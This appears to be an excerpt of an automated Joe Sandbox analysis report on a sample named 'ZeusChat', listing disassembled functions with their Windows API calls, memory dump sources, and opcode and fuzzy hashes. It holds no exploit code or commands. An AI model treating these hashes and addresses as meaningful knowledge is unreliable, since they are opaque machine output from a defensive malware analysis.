                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 3215553584-0
                                                                                                      • Opcode ID: 49a97c8ce8b369b2f42047b1b1bb4140d0dd21c8d4100dd6dfdde4f7fa664e0d
                                                                                                      • Instruction ID: 36951d74597951752eba2dba35507875c36fdb033853832a9363435cec23840d
                                                                                                      • Opcode Fuzzy Hash: 49a97c8ce8b369b2f42047b1b1bb4140d0dd21c8d4100dd6dfdde4f7fa664e0d
                                                                                                      • Instruction Fuzzy Hash: 2381D522E1E60A85F721BB259E406FDA6A0BF64744F884235DE0E576D5CFBCE44AC730
                                                                                                      Function 00007FF75203E50C Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                                      • String ID:
                                                                                                      • API String ID: 3659116390-0
                                                                                                      • Opcode ID: fa48a44f82e5a3751bdb722be5fb413316008f962baa66a44dfac203e8cd9eea
                                                                                                      • Instruction ID: 691e6082a2882fe6550bbe554fdbe11e8521ca4468ce75ae40d6d7885fa53567
                                                                                                      • Opcode Fuzzy Hash: fa48a44f82e5a3751bdb722be5fb413316008f962baa66a44dfac203e8cd9eea
                                                                                                      • Instruction Fuzzy Hash: E9512432A19A5585E710DF25DD443ACBBB0FB54B88F488235DE4E47B99DF78D049C710
                                                                                                      Function 00007FF752042828 Relevance: 7.6, APIs: 5, Instructions: 133COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 3215553584-0
                                                                                                      • Opcode ID: 2e4cf0076cbdf12184df61fca722bc08e1e8edcc07d01b2398d8d0565b611ed0
                                                                                                      • Instruction ID: 969abf2b0721cb1c6bdfaa9a263aa1d78a9cf4e42469f13181bd3c86988bdfb6
                                                                                                      • Opcode Fuzzy Hash: 2e4cf0076cbdf12184df61fca722bc08e1e8edcc07d01b2398d8d0565b611ed0
                                                                                                      • Instruction Fuzzy Hash: 6C519432F0A78289E660AF129840179F7A4EF54BA0F9D9235DAAD076D4DEBCD845C360
                                                                                                      Function 00007FF752001990 Relevance: 7.6, APIs: 5, Instructions: 124keyboardCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AsyncState$ClientCursorScreen
                                                                                                      • String ID:
                                                                                                      • API String ID: 4210589936-0
                                                                                                      • Opcode ID: 212ea22fed56076fe4411d7c93cd1191e07a29710201a96bd61674af69d79e6f
                                                                                                      • Instruction ID: 5166b353d92800051057232101e6cae638571dd4d4e32477a92a8afee8e2539c
                                                                                                      • Opcode Fuzzy Hash: 212ea22fed56076fe4411d7c93cd1191e07a29710201a96bd61674af69d79e6f
                                                                                                      • Instruction Fuzzy Hash: 7751E132B0A6828BE758EF328980569F760FB45794F984231EA6D43BD5CF78E455C720
                                                                                                      Function 00007FF75203B8BC Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc
                                                                                                      • String ID:
                                                                                                      • API String ID: 190572456-0
                                                                                                      • Opcode ID: a45d0f6615f049d54ccb6cd257a4a45fb43b8e31baabd57d5cfb2bdcd6727f95
                                                                                                      • Instruction ID: 5f20743c004955ebca5917261a36e8ae463f8a14ba6340cc4516089c98a6f088
                                                                                                      • Opcode Fuzzy Hash: a45d0f6615f049d54ccb6cd257a4a45fb43b8e31baabd57d5cfb2bdcd6727f95
                                                                                                      • Instruction Fuzzy Hash: 4E41E522B0FA4A91FA11BF06AD04275E391BF68B94F8D4536DD5D4B394DEBCE448C320
                                                                                                      Function 00007FF7520B06D0 Relevance: 7.6, APIs: 5, Instructions: 109COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Show$Enable
                                                                                                      • String ID:
                                                                                                      • API String ID: 2939132127-0
                                                                                                      • Opcode ID: bf1680c497ddafbed20fc8edb41bbefd3142ef2a208a4fb9b9f279baa3c2d0bd
                                                                                                      • Instruction ID: 1e67683419e0fe8f333f74ee1a082714e3aeab7865df4a5b021a10dfb2b33e24
                                                                                                      • Opcode Fuzzy Hash: bf1680c497ddafbed20fc8edb41bbefd3142ef2a208a4fb9b9f279baa3c2d0bd
                                                                                                      • Instruction Fuzzy Hash: F651543694A68681EB60DB15D89437DB7A2EB84B94FAC4071CA4D07764CFBDE84AC720
                                                                                                      Function 00007FF75200209C Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                                                      • String ID:
                                                                                                      • API String ID: 3225163088-0
                                                                                                      • Opcode ID: 21f8d7a47469f2a49f07ab7fee508d90b20fe2808d7db8b1552c4b0775fa0cfc
                                                                                                      • Instruction ID: cf889e0c010badfc38b46061ba2f7f9ca825d29f8f2cfa7edb5fd29c106e19d7
                                                                                                      • Opcode Fuzzy Hash: 21f8d7a47469f2a49f07ab7fee508d90b20fe2808d7db8b1552c4b0775fa0cfc
                                                                                                      • Instruction Fuzzy Hash: D7314F3192A7418AF750AB01AC8433AB7A1FB94B84FDC4135D64D47658DFBDE84ACB10
                                                                                                      Function 00007FF75203F864 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _set_statfp
                                                                                                      • String ID:
                                                                                                      • API String ID: 1156100317-0
                                                                                                      • Opcode ID: ebe8654c569b7b411d1ff88ef690df32e320daa95c2d6a494747889ce22108c0
                                                                                                      • Instruction ID: bf15770ed6aa909af178d7d11885f346cb431b0a367a5356ae04f548a184e962
                                                                                                      • Opcode Fuzzy Hash: ebe8654c569b7b411d1ff88ef690df32e320daa95c2d6a494747889ce22108c0
                                                                                                      • Instruction Fuzzy Hash: 5811C462E0E60B81F65C3224DE5E37591416FB1360FAD4630E6AD469DACEDCA84CC121
                                                                                                      Function 00007FF75202508C Relevance: 7.6, APIs: 5, Instructions: 54COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Initialize__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_initialize_onexit_tables_invalid_parameter_noinfo_onexit_set_fmode
                                                                                                      • String ID:
                                                                                                      • API String ID: 2117695475-0
                                                                                                      • Opcode ID: 5e575c077726398a46d38c0ab7510b231f7ab4447039ca8bf6b85c165a1961f5
                                                                                                      • Instruction ID: 4f38eaf9db12b7e4d1461880126856d176f1016bb3eaa9691438e1f3ff38d53f
                                                                                                      • Opcode Fuzzy Hash: 5e575c077726398a46d38c0ab7510b231f7ab4447039ca8bf6b85c165a1961f5
                                                                                                      • Instruction Fuzzy Hash: 3E11AF50E0F15746FA8873B1EE1A2B896865F61320FCC0432E94D5A9D3EDDEB84DC636
                                                                                                      Function 00007FF75207DF5C Relevance: 7.5, APIs: 5, Instructions: 36sleepCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                      • String ID:
                                                                                                      • API String ID: 2833360925-0
                                                                                                      • Opcode ID: d1d48ba528d093844c112ef2a6b88edd344cae1c5bdc8ff2dee1276ed7d49edf
                                                                                                      • Instruction ID: d1920ecbc69d17158e829b057d9707c9bc392ebc419792e1eec861a35fdc6f52
                                                                                                      • Opcode Fuzzy Hash: d1d48ba528d093844c112ef2a6b88edd344cae1c5bdc8ff2dee1276ed7d49edf
                                                                                                      • Instruction Fuzzy Hash: 7501B530B1EA0282EB15B730ACA513DD321EF95780F9C0135D10F61564DFACE88EC720
                                                                                                      Function 00007FF752080740 Relevance: 7.5, APIs: 5, Instructions: 33synchronizationthreadCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,00007FF75204B91D,?,?,?,00007FF752011CE2), ref: 00007FF752080774
                                                                                                      • TerminateThread.KERNEL32(?,?,?,00007FF75204B91D,?,?,?,00007FF752011CE2), ref: 00007FF75208077F
                                                                                                      • WaitForSingleObject.KERNEL32(?,?,?,00007FF75204B91D,?,?,?,00007FF752011CE2), ref: 00007FF75208078D
                                                                                                      • ~SyncLockT.VCCORLIB ref: 00007FF752080796
                                                                                                        • Part of subcall function 00007FF75207FF10: CloseHandle.KERNEL32(?,?,?,00007FF75208079B,?,?,?,00007FF75204B91D,?,?,?,00007FF752011CE2), ref: 00007FF75207FF21
                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,00007FF75204B91D,?,?,?,00007FF752011CE2), ref: 00007FF7520807A2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$CloseEnterHandleLeaveLockObjectSingleSyncTerminateThreadWait
                                                                                                      • String ID:
                                                                                                      • API String ID: 3142591903-0
                                                                                                      • Opcode ID: 76932726eea5529e7fdc35515854e9fd5991f11f065ee08a39893390980189ab
                                                                                                      • Instruction ID: 9db199c4bd6b980bee8bd66cb32caea853cb3feaa22852e458476765983ee793
                                                                                                      • Opcode Fuzzy Hash: 76932726eea5529e7fdc35515854e9fd5991f11f065ee08a39893390980189ab
                                                                                                      • Instruction Fuzzy Hash: DD015A36A09A5587E790AF15F84022EB370FB88B94F984031DB8E43B54CF7CD89AC710
                                                                                                      Function 00007FF752031C30 Relevance: 7.5, APIs: 5, Instructions: 31threadCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorExitLastThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 1611280651-0
                                                                                                      • Opcode ID: c939a99abec6306985d834238b453b49f76b24eaa75274ab5cb1e39e153e39a7
                                                                                                      • Instruction ID: df18e25a4dc8c3430af3a16cc77a3cfb61ed5a792ef04a5bc41270e10351ad13
                                                                                                      • Opcode Fuzzy Hash: c939a99abec6306985d834238b453b49f76b24eaa75274ab5cb1e39e153e39a7
                                                                                                      • Instruction Fuzzy Hash: FC017121B1E64682EA257B209D8423CA261EF54B74F981734C23D02AD1DFBCE85DC310
                                                                                                      Function 00007FF752002014 Relevance: 7.5, APIs: 5, Instructions: 31COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                      • String ID:
                                                                                                      • API String ID: 2625713937-0
                                                                                                      • Opcode ID: c0d1d6aa304cf5aea753b96ce6937b87738b948b12bd6a99439db02bd4df4919
                                                                                                      • Instruction ID: 8b59929af7f6b921efb176641339ad7e1e7f005caddceb419e49345077839c88
                                                                                                      • Opcode Fuzzy Hash: c0d1d6aa304cf5aea753b96ce6937b87738b948b12bd6a99439db02bd4df4919
                                                                                                      • Instruction Fuzzy Hash: A4015E71D2A68695F6647B10FD8473AA762AF04B85F9C4530C51D06269DFFEA48DC320
                                                                                                      Function 00007FF752004CFC Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 184comCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 00007FF752004050: MapVirtualKeyW.USER32(?,?,?,00007FF752004DDE), ref: 00007FF752004082
                                                                                                        • Part of subcall function 00007FF752004050: MapVirtualKeyW.USER32(?,?,?,00007FF752004DDE), ref: 00007FF752004090
                                                                                                        • Part of subcall function 00007FF752004050: MapVirtualKeyW.USER32(?,?,?,00007FF752004DDE), ref: 00007FF7520040A0
                                                                                                        • Part of subcall function 00007FF752004050: MapVirtualKeyW.USER32(?,?,?,00007FF752004DDE), ref: 00007FF7520040B0
                                                                                                        • Part of subcall function 00007FF752004050: MapVirtualKeyW.USER32(?,?,?,00007FF752004DDE), ref: 00007FF7520040BE
                                                                                                        • Part of subcall function 00007FF752004050: MapVirtualKeyW.USER32(?,?,?,00007FF752004DDE), ref: 00007FF7520040CC
                                                                                                        • Part of subcall function 00007FF7520040DC: RegisterWindowMessageW.USER32(?,?,?,00007FF752004F68), ref: 00007FF752004146
                                                                                                      • GetStdHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF75200106D), ref: 00007FF752005042
                                                                                                      • OleInitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF75200106D), ref: 00007FF7520050C8
                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF75200106D), ref: 00007FF75204B336
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                      • String ID: AutoIt
                                                                                                      • API String ID: 1986988660-2515660138
                                                                                                      • Opcode ID: 8b9a672c5679c7d79af7300a008647115a44a4ad4b9a8e2cd430e2f10d72906a
                                                                                                      • Instruction ID: 9793f52c3f6f22ebd45cbea040a47dbdbaedce27d5b6e3eae05225eeba0e97fc
                                                                                                      • Opcode Fuzzy Hash: 8b9a672c5679c7d79af7300a008647115a44a4ad4b9a8e2cd430e2f10d72906a
                                                                                                      • Instruction Fuzzy Hash: 77C1C471D9AB4385F640AB14ACC007AF7A6BF94740FD8423AD49D42668DFFCA15AC7A0
                                                                                                      Function 00007FF75202B078 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 150COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID: $*
                                                                                                      • API String ID: 3215553584-3982473090
                                                                                                      • Opcode ID: f489a03a3506d653c7ee3588779f7f95d69400e15805bf1bd0434c8f497717d8
                                                                                                      • Instruction ID: e5615c6a8a6bd2427d8f57f325357d73afc6b43f9c61be0797553d1df0ca9e53
                                                                                                      • Opcode Fuzzy Hash: f489a03a3506d653c7ee3588779f7f95d69400e15805bf1bd0434c8f497717d8
                                                                                                      • Instruction Fuzzy Hash: 3D61837290E35286E765BE24C84437CB7A0EB15B48FDC1237CA5E46199CFAEE48DC721
                                                                                                      Function 00007FF7520361B8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
